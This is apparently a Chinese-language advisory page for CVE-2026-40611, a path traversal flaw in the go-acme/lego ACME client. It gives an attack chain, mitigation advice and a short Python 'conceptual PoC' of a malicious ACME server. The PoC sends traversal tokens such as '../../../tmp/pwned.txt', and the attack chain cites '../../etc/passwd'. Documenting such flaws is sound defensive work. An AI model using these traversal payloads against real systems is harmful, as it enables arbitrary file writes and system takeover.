CVE-2026-40611 CVSS 8.8 高危

CVE-2026-40611 Lego路径遍历致任意文件写入

披露日期: 2026-04-21

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-40611

漏洞类型

路径遍历

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

go-acme/lego

漏洞概述

go-acme/lego是用Go语言编写的Let's Encrypt客户端和ACME库。在4.34.0版本之前，其webroot HTTP-01挑战提供程序存在安全漏洞。由于缺乏对用户输入的充分校验，恶意的ACME服务器可以提供包含“../”序列的精心制作的挑战令牌。这会导致lego在处理验证请求时，将攻击者控制的内容写入到文件系统中任意可写的路径，甚至删除文件，从而破坏系统完整性。

技术细节

该漏洞的核心在于webroot HTTP-01挑战处理逻辑中未对挑战令牌进行路径规范化处理。正常情况下，lego会将令牌写入预定义的webroot目录下。然而，当攻击者控制ACME服务器并返回包含路径遍历字符（如`../`）的令牌时，lego客户端直接拼接路径并执行写入操作。由于程序未检查最终路径是否仍在webroot目录内，攻击者可以利用此漏洞向服务器上的任意位置（取决于lego进程的权限）写入文件。这可能被利用覆盖系统配置文件、写入后门或窃取敏感数据。

攻击链分析

STEP 1

1. 环境准备

攻击者搭建一个恶意的ACME服务器，或者劫持合法的ACME服务器通信。

STEP 2

2. 触发挑战

受害者使用存在漏洞的lego客户端（<4.34.0）向恶意服务器发起证书签发请求，触发HTTP-01挑战。

STEP 3

3. 发送恶意令牌

恶意ACME服务器响应请求，返回包含路径遍历序列（如`../../etc/passwd`）的挑战令牌。

STEP 4

4. 文件写入

lego客户端在未验证路径合法性的情况下，将验证内容写入到攻击者指定的任意路径。

STEP 5

5. 达成攻击

成功实现任意文件写入或删除，可能导致系统被控制或数据泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Conceptual PoC: Malicious ACME Server Response
# This is a simulation of how the vulnerability is triggered.

import http.server
import socketserver
import json

class MaliciousACMEServer(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        # Simulating a challenge request
        if ".well-known/acme-challenge/" in self.path:
            # The crafted token containing path traversal
            # e.g., writing to /tmp/pwned.txt
            malicious_token = "../../../tmp/pwned.txt"
            key_authorization = "attacker_controlled_content"
            
            self.send_response(200)
            self.send_header('Content-type', 'text/plain')
            self.end_headers()
            
            # In a real scenario, the client would write this to the path derived from the token
            print(f"[+] Sending malicious token: {malicious_token}")
            self.wfile.write(f"{{\"token\": \"{malicious_token}\", \"keyAuthorization\": \"{key_authorization}\"}}".encode())
        else:
            self.send_response(404)
            self.end_headers()

if __name__ == "__main__":
    PORT = 8080
    with socketserver.TCPServer(("", PORT), MaliciousACMEServer) as httpd:
        print(f"Serving malicious ACME response at port {PORT}")
        httpd.serve_forever()
# Note: This demonstrates the concept of the crafted payload.

影响范围

go-acme/lego < 4.34.0

防御指南

临时缓解措施

建议立即检查所有使用go-acme/lego库的应用程序版本。在升级前，可采取最小权限原则运行服务，避免以root权限运行lego客户端，并使用容器或沙箱环境隔离进程，以限制文件写入范围。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表